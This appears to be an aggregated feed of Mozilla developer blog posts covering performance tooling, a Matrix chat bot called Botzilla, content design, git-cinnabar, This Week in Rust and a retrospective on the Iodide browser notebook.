Most of the work on Warp was done by Caroline Cullen, Iain Ireland, Jan de Mooij, and our amazing contributors André Bargull and Tom Schuster. The rest of the SpiderMonkey team provided us with a lot of feedback and ideas. Christian Holler and Gary Kwong reported various fuzz bugs.

Thanks to Ted Campbell, Caroline Cullen, Steven DeTar, Matthew Gaudet, Melissa Thermidor, and especially Iain Ireland for their great feedback and suggestions for this post.

The post Warp: Improved JS performance in Firefox 83 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogUsing the Mach Perftest Notebook

Using the Mach Perftest Notebook

In my previous blog post, I discussed an ETL (Extract-Transform-Load) implementation for doing local data analysis within Mozilla in a standardized way. That work provided us with a straightforward way of consuming data from various sources and standardizing it to conform to the expected structure for pre-built analysis scripts.

Today, not only are we using this ETL (called PerftestETL) locally, but also in our CI system! There, we have a tool called Perfherder which ingests data created by our tests in CI so that we can build up visualizations and dashboards like Are We Fast Yet (AWFY). The big benefit that this new ETL system provides here is that it greatly simplifies the path to getting from raw data to a Perfherder-formatted datum. This lets developers ignore the data pre-processing stage which isn’t important to them. All of this is currently available in our new performance testing framework MozPerftest.

One thing that I omitted from the last blog post is how we use this tool locally for analyzing our data. We had two students from Bishop’s University (:axew, and :yue) work on this tool for course credits during the 2020 Winter semester. Over the summer, they continued hacking with us on this project and finalized the work needed to do local analyses using this tool through MozPerftest.

Below you can see a recording of how this all works together when you run tests locally for comparisons.

There is no audio in the video so here’s a short summary of what’s happening:

  1. We start off with a folder containing some historical data from past test iterations that we want to compare the current data to.
  2. We start the MozPerftest test using the `–notebook-compare-to` option to specify what we want to compare the new data with.
  3. The test runs for 10 iterations (the video is cut to show only one).
  4. Once the test ends, the PerftestETL runs and standardizes the data and then we start a server to serve the data to Iodide (our notebook of choice).
  5. A new browser window/tab opens to Iodide with some custom code already inserted into the editor (through a POST request) for a comparison view that we built.
  6. Iodide is run, and a table is produced in the report.
  7. The report then shows the difference between each historical iteration and the newest run.

With these pre-built analyses, we can help developers who are tracking metrics for a product over time, or simply checking how their changes affected performance without having to build their own scripts. This ensures that we have an organization-wide standardized approach for analyzing and viewing data locally. Otherwise, developers each start making their own report which (1) wastes their time, and more importantly, (2) requires consumers of these reports to familiarize themselves with the format.

That said, the real beauty in the MozPerftest integration is that we’ve decoupled the ETL from the notebook-specific code. This lets us expand the notebooks that we can open data in so we could add the capability for using R-Studio, Google Data Studio, or Jupyter Notebook in the future.

If you have any questions, feel free to reach out to us on Riot in #perftest.

 

Mozilla Performance BlogPerformance Sheriff Newsletter (October 2020)

In October there were 202 alerts generated, resulting in 25 regression bugs being filed on average 4.4 days after the regressing change landed.

Welcome to the second edition of the new format for the performance sheriffing newsletter! In last month’s newsletter I shared details of our sheriffing efficiency metrics. If you’re interested in the latest results for these you can find them summarised below, or (if you have access) you can view them in detail on our full dashboard. As sheriffing efficiency is so important to the prevention of shipping performance regressions to users, I will include these metrics in each month’s newsletter.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.7 days
  • 75% of alerts were triaged within 3 days
  • Valid regression alerts were associated with a bug in an average of 2 days
  • 95% of valid regression alerts were associated with a bug within 5 days

Regressions by release

For this edition I’m going to focus on a relatively new metric that we’ve been tracking, which is regressions by release. This metric shows valid regressions by the version of Firefox that they were first identified in, grouped by status. It’s important to note that we are running these performance tests against our Nightly builds, which is where we land new and experimentational changes, and the results cannot be compared with our release builds.

Regression Bugs by Release VersionIn the above chart I have excluded bugs resolved as duplicates, as well as results prior to release 72 and later than 83 as these datasets are incomplete. You’ll notice that the more recent releases have unresolved bugs, which is to be expected if the investigations are ongoing. What’s concerning is that there are many regression bugs for earlier releases that remain unresolved. The following chart highlights this by carrying unresolved regressions into the following release versions.

Regression Bugs by Release Version (carrying open bugs)

When performance sheriffs open regression bugs, they do their best to identify the commit that caused the regression and open a needinfo for the author. The affected Firefox version is indicated (this is how we’re able to gather these metrics), and appropriate keywords are added to the bug so that it shows up in the performance triage and release management workflows. Whilst the sheriffs do attempt to follow up on regression bugs, it’s clear that there are situations where the bug makes slow progress. We’re already thinking about how we can improve our procedures and policies around performance regressions, but in the meantime please consider taking a look over the open bugs listed below to see if any can be nudged back into life.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for October can be found here (for those with access).

Benjamin BouvierBotzilla, a multi-purpose Matrix bot tuned for Mozilla

Over the last year, Mozilla has decided to shut down the IRC network and replace it with a more modern platform. To my greatest delight, the Matrix ecosystem has been selected among all the possible replacements. For those who might not know Matrix, it's a modern, decentralized protocol, using plain HTTP JSON-formatted endpoints, well-documented, and it implements both features that are common in recent messaging systems (e.g. file attachments, message edits and deletions), as well as those needed to handle large groups (e.g. moderation tools, private rooms, invite-only rooms).

In this post I reflect on my personal history of writing chat bots, and then present a panel of features that the bot has, some user-facing ones, some others that embody what I esteem to be a sane, well-behaved Matrix bot.

but first, some history

Back in 2014 when I was an intern at Mozilla, I made a silly IRC JavaScript bot that would quote the @horsejs twitter account, when asked to do so. Then a few other useless features were added: "karma" tracking 1, being a karma guardian angel (lowering the karma of people lowering the karma of some predefined people), keeping track of contextless quotes from misc people...

Over time, it slowly transformed into an IRC bot framework, with modules you could attach and configure at startup, setting which rooms the bot would join, what should be the cooldowns for message sending (more on this later), and so much more! Hence it was renamed meta-bot.

an aside on the morality of bots

I find making bots a fun activity, since once you've passed the step of connecting and sending messages, the rest is mostly easy (cough cough regular expressions cough cough) and creative work. And it's unfortunately easy to be reckless too.

At this time, I never considered the potentially bad effects of quoting text from a random source, viz. fetching tweets from the @horsejs account. If the source would return a message that was inconsiderate, rude, or even worse, aggressive, then the bot would replicate this behavior. It is a real issue because although the bot doesn't think by itself and doesn't mean any harm, its programmers can do better, and they should try to avoid these issues at all costs. A chat bot replicates the culture of the engineers who made it on one hand, but also contributes to propagating this culture in the chat rooms it participates in, normalizing it to the chat participants.

My bot happened to be well-behaved most of the time... until one time where it was not. After noticing the incident and expressing my deepest apologies, I deactivated the module and went through the whole list of modules, to make sure none could cause any harm, in any possible way. I should have known better in the first place! I am really not trying to signal my own virtue, since I failed in a way that should have been predictable. I hope by writing this that other people may reflect about the actions of their bots as well, in case they could be misbehaving like this.

the former fleet of mozilla bots

There were a few other useful IRC bots (of which I wasn't the author) hanging out in the Mozilla IRC rooms, notably Firebot and mrggigles. The latter probably started as a joke too, to enumerate puns from a list in the JavaScript channel. Then it outgrew its responsibilities by helping with a handful of requests: who can review this or this file in Mozilla's source code? what's the status of the continuous integration trees? can this particular C++ function used in Gecko cause a garbage collection?

When we moved over to Matrix, the bots unfortunately became outdated, since the communication protocol (IRC) they were using was different. We could have ported them to the Matrix protocol, but the Not-Invented-Here syndrom was strong with this one: I've been making bots for a while, and I was personally interested in the Matrix protocol and trying out the JS facilities offered by the Matrix ecosystem.

Botzilla features

So I've decided to write Botzilla, a successor in spirit to meta-bot and mrgiggles, written in TypeScript. This is a very unofficial bot, tailored for Mozilla's needs but probably useful in other contexts. I've worked on it informally as a side-project, on my copious spare time. Crafting tools that show useful to other people has been sufficient a reward to motivate me to work on it, so it's been quite fun!

Botzilla's logo

Botzilla's logo, courtesy of Nical

Let's take a look at all the features that the bot offers, at this point.

uuid: Generate unique IDs

This was a feature of Firebot, and easy enough to replicate, so this was the test feature for the Matrix bot. When saying !uuid, the bot will automatically generate a unique id (using uuid v4), guaranteed GMO-free and usable in any context that would require it. This was the first module, designed to test the framework.

Demo of uuid

treestatus: Inform about CI tree status

Mozilla developers tend to interact a lot with the continuous integration trees, because code is sometimes landed, sometimes backed out (sorry/thank you sheriffs!), sometimes merged across branches. This leads to the integration trees being closed. Before we had the feature to automatically land patch stacks when the trees reopened, it was useful to be able to get the open/close status of a tree. Asking !treestatus will answer with a list of the status of some common trees. It is also possible to request the status of a particular tree, e.g. for the "mozilla-central" tree, by asking !treestatus mozilla-central (or just central, as a handy shortcut).

Demo of treestatus

Expand bug status

If you have ever interacted with Mozilla's code, there's chances that you've used Bugzilla, and mentioned bug numbers in conversations. The bot caches any message containing bug XXX and will respond with a link to this bug, the nickname of the person assigned to this bug if there's one, and the summary of this bug, if it's public. This is by far the most used and useful module, since it doesn't require a special incantation, but will react automatically to a lot of messages written with no particular intent (see below where it's explained how to not be spammy, though).

Demo of expand-bug

Who Can Review X?

This was a very nice feature that mrgiggles had: ask for potential reviewers for a particular file in the Gecko source tree and get a list of most recent reviewers. Botzilla replicates this, when seeing the trigger: who can review js/src/wasm/WasmJS.cpp?. The list of potential reviewers is extracted from Mercurial logs, looking for the N last reviewers of this particular file.

As a bonus, there's no need to pass the full path to the file, if the file's name is unique in the tree's source code. Botzilla will trigger a search in Searchfox, and will use the unique name in the result list, if there's such a unique result. The previous example thus can be shortened to who can review WasmJS.cpp? since the file's name is unique in the whole code base.

Demo of who can review

{Github,Gitlab} {issues,{P,M}Rs}

It is possible for a room administrator to "connect" a given Matrix room to a Github repository. Later on, any mention of issues or pull requests by their number, e.g. #1234, will make Botzilla react with the summary and a link to the issue/PR at stake.

This also works for Gitlab repositories, with slight differences: the administrator has to precise what's the root URL of the Gitlab instance (since Gitlab can be selfhosted). Issues are caught when numbers follows a # sign, while merge requests are caught when the numbers follow a ! sign.

Demo of gitlab

!tweet/!toot: Post on Twitter/Mastodon

An administrator can configure a room to tie it up to a Twitter (respectively Mastodon) user account, using API tokens. Then, any person with an administrative role can post messages with !tweet something shocking for the bird site(respectively !toot something heartful for the mammoth site). This makes it possible to allow other people to post on these social networks without the need to give them the account's password.

Unfortunately, the Twitter module hasn't ever been tested, since when I've tried to create a developer account, Twitter accepted it after a few days but then never displayed the API tokens on the interface. The support also never answered when I asked for help. Thankfully Mastodon can be self-hosted and thus it is easier to test. I'm happy to report that it works quite well!

confession and histoire

It is quite common in teams to set up regular standup meetings, where everyone in the team announces what they've been working on in the last few days or week. It also strikes me as important for personal recognition, including towards management, to be able to show off (just a bit!) what you've accomplished recently, and to remember this when times are harder (see also Julia Evans' blog post on the topic).

There's a Botzilla module for this. Every time someone starts a message with confession:, then everything after the colon will be saved in a database (...wait for it!). Then, all the confessions are displayed on the Histoire 2 website, with one message feed per user. Note it is possible to send confessions privately to Botzilla (that doesn't affect the frontend though, which is open and public to all!), or in a public channel. Public channels somehow equate to team members, so channels also get their own pages on the frontend.

Demo of confession

Screenshot of Histoire

Now the fun/cursed part is how all of this works. This was implemented in mrgiggles, and I liked it a lot, since it required no kind of backend or frontend server. How so? By (ab)using Github files as the database and Github pages as the frontend. Sending a confession will trigger a request to a Github endpoint to find a database file segregated by time, then it will trigger another request to create/modify it with the content of the confession. The frontend then uses other requests to public Github APIs to read the confessions before dynamically rendering those. Astute readers will notice that under a lot of confession activity, the bot would be a bit slowed down by Github's API use rates. In this case, there's some exponential backoff behavior before trying to re-send unsaved confessions to Github. Overall it works great, and API limitation rates have never quite been a problem.

Intrinsic features: they're good bots, bront

In addition to all the user-facing features, the bot has a few other interesting attributes that are more relevant to consider from a framework point of view. Hopefully some of these ideas can be useful for other bot authors!

Join All The Rooms!

Every time the bot is invited to a channel, be it public or private, it will join the channel, making it easy to use in general. It was implemented for free by the JS framework I've been using, and it is a definitive improvement over the IRC version of the bot.

Sometimes Matrix rooms are upgraded to a new version of the room. The bot will try to join the upgraded room if it can, keeping all its room settings intact during the transition.

Thou shalt not spam

To avoid spamming the channel, especially for modules that are reactions to other messages (think: bug numbers, issues/pull requests mentions), the bot has had to learn how to keep quiet. There are two rules triggering the quieting behavior:

  • if the bot has already reacted less than N minutes ago (where N is a configurable amount) in the same room,
  • or if it has already reacted to some entity in a message, and there's been fewer than M messages in between the last reaction and the last message mentioning the same entity in the same room (M is also configurable)

If any of these two criteria is met, then the bot will keep quiet and it will not react to another similar message. The combination of these two has proven over time to be quite solid in my experience, based on observing the bot's behavior and public reactions to its behavior.

Some similar mechanism is used for the confession module: on a first confession, the bot will answer with a message saying it has seen the confession, including a link to where it is going to be posted, and will add an emoji "eyes" reaction to the message. Posting this long form message could be quite spammy, if there's a lot of confessions around the same time. Under the same criteria, it will just react with an "eyes" emoji to other confessions. Later on, it'll resend the full message, once both criterias aren't blocking it from doing so.

Decentralized administration self-service

The bot can be administrated, by discussing with it using the !admin command. This can happen in both a private conversation with it, or in public channels, yet it is recommended to do so in private channels. To confirm that an admin action has succeeded, it'll use the thumbs-up emoji on the message doing the particular action.

To have a single administrator for the bot would be quite the burden, and it is not resilient to people switching roles, leaving the company, etc. Normally you'd solve this by implementing your own access control lists. Fortunately, Matrix already has a concept of power levels that assigns roles to users, among which there are the administrator and moderator roles.

The bot will rely on this to decide to which requests it will answer. Somebody marked as an administrator or a moderator of a room can administrate Botzilla in this particular room, using the !admin commands. There's still a super-admin role, that must be defined in the configuration, in case things go awry. While administrators only have power over the current room, a super-admin can use its super-powers to change anything in any room. This decentralization of the administrative roles makes it easy to have different settings for different rooms, and to rely a bit less on single individuals.

Key-value store

In general, the bot contains a key-value store implemented in an sqlite database, making it easy to migrate and add context that's preserved across restarts of the bot. This is used to store private information like user repository information and settings for most rooms. Conceptually, each pair of room and module has its own key-value store, so that there's no risk of confusion between different rooms and modules. There's also a key-value per-module store that's applicable to all the rooms, to represent global settings. If there's some non-global (per room) settings for a room, these are preferred over the global settings.

Self-documentation

Each chat module is implemented as a ECMAScript module and must export an help string along the main reaction function. This is then captured and aggregated as part of an !help command, that can be used to request help about usage of the bot. The main help message will display the list of all the enabled modules, and help about a specific module may be queried with e.g. !help uuid.

Future work and conclusion

If I were to start again, I'd do a few things differently:

  • now that the Rust ecosystem around the Matrix platform has matured a bit, I'd probably write this bot in Rust. Starting from JavaScript and moving to TypeScript has helped me catch a few static issues. I'd expect moving to Rust would help handling Matrix events faster, provide end-to-end encryption support for free, and be quite pleasant to use in general thanks to the awesome Rust tooling.
  • use a real single-page app framework for the Histoire website. Maybe? I mean I'm a big fan of VanillaJS, but using it means re-creating your own Web framework like thing to make it nice and productive to use.
  • despite being a fun hack, using Github as a backend has algorithmic limitations, that can make the web app sluggish. In particular, a combined feed for N users on M eras (think: periods) will trigger NxM Github API requests. Using a plain database with a plain API would probably be simpler at this point. This is mitigated with an in-memory cache so only the first time all the requests happen, but crafting my own requests would be more expressive and efficient, and allow for more features too (like displaying the list of rooms on the start view).
  • provide a (better) commands parser. Regular expressions in this context are a bit feeble and limited. Also right now each module could in theory reuse the same command triggers as another one, etc.
  • implement the chat modules in WebAssembly :-) In fact, I think there's a whole business model which would consist in having the bot framework including a wasm VM, and interacting with different communication platforms (not restricted to Matrix). Developers in such a bot platform could choose which source language to use for developing their own modules. It ought to be possible to define a clear, restricted, WASI-like capabilities-based interface that gets passed to each chat module. In such a sandboxed environment, the responsibility for hosting the bot's code is decoupled from the responsibility of writing modules. So a company could make the platform available, and paying users would develop the modules and host them. Imagine git pushing your chat modules and they get compiled to wasm and deployed on the fly. But I digress! (Please do not forget to credit me with a large $$$ envelope/a nice piece of swag if implementing this at least multi-billion dollars idea.)

I'd like to finish by thanking the authors of the previous Mozilla bots, namely sfink and glob: your puppets have been incredible sources of inspiration. Also huge thanks to the people hanging in the matrix-bot-sdk chat room, who've answered questions and provided help in a few occasions.

I hope you liked this presentation of Botzilla and its features! Of course, all the code is free and open-source, including the bot as well as the histoire frontend. At this point it is addressing most of the needs I had, so I don't have immediate plans to extend it further. I'd happily take contributions, though, so feel free to chime in if you'd like to implement anything! It's also a breeze to run on any machine, thanks to Docker-based deployment. Have fun with it!


  1. Karma is an IRC idiosyncrasy, in which users rate up and down other users using their nickname suffixed with ++ or --. Karma tracking consists in keeping scores and displaying those. 

  2. Histoire is the French for "history" and "story". Inherited from Steve Fink's very own mrgiggles :-) 

Firefox UXWe’re Changing Our Name to Content Design

The Firefox UX content team has a new name that better reflects how we work.

Co-authored with Betsy Mikel

Stock photo image of a stack of blank business cards

Photo by Brando Makes Branding on Unsplash

<figcaption class="imageCaption"></figcaption>

 

Hello. We’re the Firefox Content Design team. We’ve actually met before, but our name then was the Firefox Content Strategy team.

Why did we change our name to Content Design, you ask? Well, for a few (good) reasons.

It better captures what we do

We are designers, and our material is content. Content can be words, but it can be other things, too, like layout, hierarchy, iconography, and illustration. Words are one of the foundational elements in our design toolkit — similar to color or typography for visual designers — but it’s not always written words, and words aren’t created in a vacuum. Our practice is informed by research and an understanding of the holistic user journey. The type of content, and how content appears, is something we also create in close partnership with UX designers and researchers.

“Then, instead of saying ‘How shall I write this?’, you say, ‘What content will best meet this need?’ The answer might be words, but it might also be other things: pictures, diagrams, charts, links, calendars, a series of questions and answers, videos, addresses, maps […] and many more besides. When your job is to decide which of those, or which combination of several of them, meets the user’s need — that’s content design.”
— Sarah Richards defined the content design practice in her seminal work, Content Design

It helps others understand how to work with us

While content strategy accurately captures the full breadth of what we do, this descriptor is better understood by those doing content strategy work or very familiar with it. And, as we know from writing product copy, accuracy is not synonymous with clarity.

Strategy can also sound like something we create on our own and then lob over a fence. In contrast, design is understood as an immersive and collaborative practice, grounded in solving user problems and business goals together.

Content design is thus a clearer descriptor for a broader audience. When we collaborate cross-functionally (with product managers, engineers, marketing), it’s important they understand what to expect from our contributions, and how and when to engage us in the process. We often get asked: “When is the right time to bring in content? And the answer is: “The same time you’d bring in a designer.”

We’re aligning with the field

Content strategy is a job title often used by the much larger field of marketing content strategy or publishing. There are website content strategists, SEO content strategists, and social media content strategists, all who do different types of content-related work. Content design is a job title specific to product and user experience.

And, making this change is in keeping with where the field is going. Organizations like Slack, Netflix, Intuit, and IBM also use content design, and practice leaders Shopify and Facebook recently made the change, articulating reasons that we share and echo here.

It distinguishes the totality of our work from copywriting

Writing interface copy is about 10% of what we do. While we do write words that appear in the product, it’s often at the end of a thoughtful design process that we participate in or lead.

We’re still doing all the same things we did as content strategists, and we are still strategic in how we work (and shouldn’t everyone be strategic in how they work, anyway?) but we are choosing a title that better captures the unseen but equally important work we do to arrive at the words.

It’s the best option for us, but there’s no ‘right’ option

Job titles are tricky, especially for an emerging field like content design. The fact that titles are up for debate and actively evolving shows just how new our profession is. While there have been people creating product content experiences for a while, the field is really starting to now professionalize and expand. For example, we just got our first dedicated content design and UX writing conference this year with Button.

Content strategy can be a good umbrella term for the activities of content design and UX writing. Larger teams might choose to differentiate more, staffing specialized strategists, content designers, and UX writers. For now, content design is the best option for us, where we are, and the context and organization in which we work.

“There’s no ‘correct’ job title or description for this work. There’s not a single way you should contribute to your teams or help others understand what you do.”
 — Metts & Welfle, Writing is Designing

Words matter

We’re documenting our name change publicly because, as our fellow content designers know, words matter. They reflect but also shape reality.

We feel a bit self-conscious about this declaration, and maybe that’s because we are the newest guests at the UX party — so new that we are still writing, and rewriting, our name tag. So, hi, it’s nice to see you (again). We’re happy to be here.

 

Thank you to Michelle Heubusch, Gemma Petrie, and Katie Caldwell for reviewing this post. 

Mike HommeyAnnouncing git-cinnabar 0.5.6

Please partake in the git-cinnabar survey.

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.5?

  • Updated git to 2.29.2 for the helper.
  • git cinnabar git2hg and git cinnabar hg2git now have a --batch flag.
  • Fixed a few issues with experimental support for python 3.
  • Fixed compatibility issues with mercurial >= 5.5.
  • Avoid downloading unsupported clonebundles.
  • Provide more resilience to network problems during bundle download.
  • Prebuilt helper for Apple Silicon macos now available via git cinnabar download.

Karl DubostCareer Opportunities mean a lot of things

When being asked

I believe there are good career opportunities for me at Company X

what do you understand? Some people will associate this directly to climbing the hierarchy ladder of the company. I have the feeling the reality is a lot more diverse. "career opportunities" mean different things to different people.

So I asked around me (friends, family, colleague) what was their take about it, outside of going higher in the hierarchy.

  • change of titles (role recognition).

    This doesn't necessary imply climbing the hierarchy ladder, it can just mean you are recognized for a certain expertise.

  • change of salary/work status (money/time).

    Sometimes, people don't want to change their status but want a better compensation, or a better working schedule (aka working 4 days a week with the same salary).

  • change of responsibilities (practical work being done in the team)

    Some will see this as a possibility to learn new tricks, to diversify the work they do on a daily basis.

  • change of team (working on different things inside the company)

    Working on a different team because you think they do something super interesting there is appealing.

  • being mentored (inside your own company)

    It's a bit similar to the two previous one, but there's a framework inside the company where you are not helping and/or bringing your skills to the project, but you go partially in another team to learn the work of this team. Think about it as a kind of internal internship.

  • change of region/country

    Working in a different country or region in the same country when it's your own choice. This flexibility is a gem for me. I did it a couple of times. When working at W3C, I moved from the office on the French Riviera to working from home in Montreal (Canada). And a bit later, I moved from Montreal to the W3C office in Japan. At Mozilla too, (after moving back to Montreal for a couple of years), I moved from Montreal to Japan again. There are career opportunities because they allow you to work in a different setting with different people and communities, and this in itself makes the life a lot richer.

  • Having dedicated/planned time for Conference or Courses

    Being able to follow a class on a topic which helps the individual to grow is super useful. But for this to be successful, it has to be understood that it requires time. Time to follow the courses, time to do the homework of the course.

I'm pretty sure there are other possibilities. Thanks to everyone who shared their thoughts.

Otsukare!

Firefox UXHow to Write Microcopy That Improves the User Experience

Photo of typesetting letters of various shapes and sizes.

Photo by Amador Loureiro on Unsplash.

The small bits of copy you see sprinkled throughout apps and websites are called microcopy. As content designers, we think deeply about what each word communicates.

Microcopy is the tidiest of UI copy types. But do not let its crisp, contained presentation fool you: the process to get to those final, perfect words can be messy. Very messy. Multiple drafts messy, mired with business and technical constraints.

Here’s a secret about good writing that no one ever tells you: When you encounter clear UX content, it’s a result of editing and revision. The person who wrote those words likely had a dozen or more versions you’ll never see. They also probably had some business or technical constraints to consider, too.

If you’ve ever wondered what all goes into writing microcopy, pour yourself a micro-cup of espresso or a micro-brew and read on!

Quotation attributed to Blaise Pascale that reads: I would have written a shorter letter, but I did not have the time.

Blaise Pascal, translated from Lettres Provinciales

1. Understand the component and how it behaves.

As a content designer, you should try to consider as many cases as possible up front. Work with Design and Engineering to test the limits of the container you’re writing for. What will copy look like when it’s really short? What will it look like when it’s really long? You might be surprised what you discover.

Images of two Firefox iOS widgets: Quick Actions and Top Sites.

Before writing the microcopy for iOS widgets, I needed first to understand the component and how it worked.

Apple recently introduced a new component to the iOS ecosystem. You can now add widgets the Home Screen on your iPhone, iPad, or iPod touch. The Firefox widgets allow you to start a search, close your tabs, or open one of your top sites.

Before I sat down to write a single word of microcopy, I would need to know the following:

  • Is there a character limit for the widget descriptions?
  • What happens if the copy expands beyond that character limit? Does it truncate?
  • We had three widget sizes. Would this impact the available space for microcopy?

Because these widgets didn’t yet exist in the wild for me to interact with, I asked Engineering to help answer my questions. Engineering played with variations of character length in a testing environment to see how the UI might change.

Image of two iOS testing widgets side-by-side, one with a long description and one with a short description.

Engineering tried variations of copy length in a testing environment. This helped us understand surprising behavior in the template itself.

We learned the template behaved in a peculiar way. The widget would shrink to accommodate a longer description. Then, the template would essentially lock to that size. Even if other widgets had shorter descriptions, the widgets themselves would appear teeny. You had to strain your eyes to read any text on the widget itself. Long story short, the descriptions needed to be as concise as possible. This would accommodate for localization and keep the widgets from shrinking.

First learning how the widgets behaved was a crucial step to writing effective microcopy. Build relationships with cross-functional peers so you can ask those questions and understand the limitations of the component you need to write for.

2. Spit out your first draft. Then revise, revise, revise.

Image of a Mark Twain quote: https://www.goodreads.com/quotes/4957-the-difference-between-the-almost-right-word-and-the-right

Mark Twain, The Wit and Wisdom of Mark Twain

Now that I understood my constraints, I was ready to start typing. I typically work through several versions in a Google Doc, wearing out my delete key as I keep reworking until I get it ‘right.’

Image of a table outlining iterations of microcopy written and an assessment of each one.

I wrote several iterations of the description for this widget to maximize the limited space and make the microcopy as useful as possible.

Microcopy strives to provide maximum clarity in a limited amount of space. Every word counts and has to work hard. It’s worth the effort to analyze each word and ask yourself if it’s serving you as well as it could. Consider tense, voice, and other words on the screen.

3. Solicit feedback on your work.

Before delivering final strings to Engineering, it’s always a good practice to get a second set of eyes from a fellow team member (this could be a content designer, UX designer, or researcher). Someone less familiar with the problem space can help spot confusing language or superfluous words.

In many cases, our team also runs copy by our localization team to understand if the language might be too US-centric. Sometimes we will add a note for our localizers to explain the context and intent of the message. We also do a legal review with in-house product counsel. These extra checks give us better confidence in the microcopy we ultimately ship.

Wrapping up

Magical microcopy doesn’t shoot from our fingertips as we type (though we wish it did)! If we have any trade secrets to share, it’s only that first we seek to understand our constraints, then we revise, tweak, and rethink our words many times over. Ideally we bring in a partner to help us further refine and help us catch blind spots. This is why writing short can take time.
If you’re tasked with writing microcopy, first learn as much as you can about the component you are writing for, particularly its constraints. When you finally sit down to write, don’t worry about getting it right the first time. Get your thoughts on paper, reflect on what you can improve, then repeat. You’ll get crisper and cleaner with each draft.

Acknowledgements

Thank you to my editors Meridel Walkington and Sharon Bautista for your excellent notes and suggestions on this post. Thanks to Emanuela Damiani for the Figma help.

This post was originally published on Medium.

This Week In RustThis Week in Rust 364

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is postfix-macros, a clever hack to allow postfix macros in stable Rust.

Thanks to Willi Kappler for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

333 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-10: 1 Regression, 2 Improvements, 2 mixed

A mixed week with improvements still outweighing regressions. Perhaps the biggest highlight was the move to compiling rustc crates with the initial-exec TLS model which results in fewer calls to _tls_get_addr and thus faster compile times.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

There are no bad programmers, only insufficiently advanced compilers

Esteban Kuber on twitter

Thanks to Nixon Enraght-Moony for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

William Lachanceiodide retrospective

A bit belatedly, I thought I’d write a short retrospective on Iodide: an effort to create a compelling, client-centred scientific notebook environment.

Despite not writing a ton about it (the sole exception being this brief essay about my conservative choice for the server backend) Iodide took up a very large chunk of my mental energy from late 2018 through 2019. It was also essentially my only attempt at working on something that was on its way to being an actual product while at Mozilla: while I’ve led other projects that have been interesting and/or impactful in my 9 odd-years here (mozregression and perfherder being the biggest successes), they fall firmly into the “internal tools supporting another product” category.

At this point it’s probably safe to say that the project has wound down: no one is being paid to work on Iodide and it’s essentially in extreme maintenance mode. Before it’s put to bed altogether, I’d like to write a few notes about its approach, where I think it had big advantanges, and where it seems to fall short. I’ll conclude with some areas I’d like to explore (or would like to see others explore!). I’d like to emphasize that this is my opinion only: the rest of the Iodide core team no doubt have their own thoughts. That said, let’s jump in.

What is Iodide, anyway?

One thing that’s interesting about a product like Iodide is that people tend to project their hopes and dreams onto it: if you asked any given member of the Iodide team to give a 200 word description of the project, you’d probably get a slightly different answer emphasizing different things. That said, a fair initial approximation of the project vision would be “a scientific notebook like Jupyter, but running in the browser”.

What does this mean? First, let’s talk about what Jupyter does: at heart, it’s basically a Python “kernel” (read: interpreter), fronted by a webserver. You send snipits of the code to the interpreter via a web interface and they would faithfully be run on the backend (either on your local machine in a separate process or a server in the cloud). Results are then be returned back to the web interface and then rendered by the browser in one form or another.

Iodide’s model is quite similar, with one difference: instead of running the kernel in another process or somewhere in the cloud, all the heavy lifting happens in the browser itself, using the local JavaScript and/or WebAssembly runtime. The very first version of the product that Hamilton Ulmer and Brendan Colloran came up with was definitely in this category: it had no server-side component whatsoever.

Truth be told, even applications like Jupyter do a fair amount of computation on the client side to render a user interface and the results of computations: the distinction is not as clear cut as you might think. But in general I think the premise holds: if you load an iodide notebook today (still possible on alpha.iodide.io! no account required), the only thing that comes from the server is a little bit of static JavaScript and a flat file delivered as a JSON payload. All the “magic” of whatever computation you might come up with happens on the client.

Let’s take a quick look at the default tryit iodide notebook to give an idea of what I mean:

%% fetch
// load a js library and a csv file with a fetch cell
js: https://cdnjs.cloudflare.com/ajax/libs/d3/4.10.2/d3.js
text: csvDataString = https://data.sfgov.org/api/views/5cei-gny5/rows.csv?accessType=DOWNLOAD

%% js
// parse the data using the d3 library (and show the value in the console)
parsedData = d3.csvParse(csvDataString)

%% js
// replace the text in the report element "htmlInMd"
document.getElementById('htmlInMd').innerText = parsedData[0].Address

%% py
# use python to select some of the data
from js import parsedData
[x['Address'] for x in parsedData if x['Lead Remediation'] == 'true']

The %% delimiters indicate individual cells. The fetch cell is an iodide-native cell with its own logic to load the specified resources into a JavaScript variables when evaluated. js and py cells direct the browser to interpret the code inside of them, which causes the DOM to mutate. From these building blocks (and a few others), you can build up an interactive report which can also be freely forked and edited by anyone who cares to.

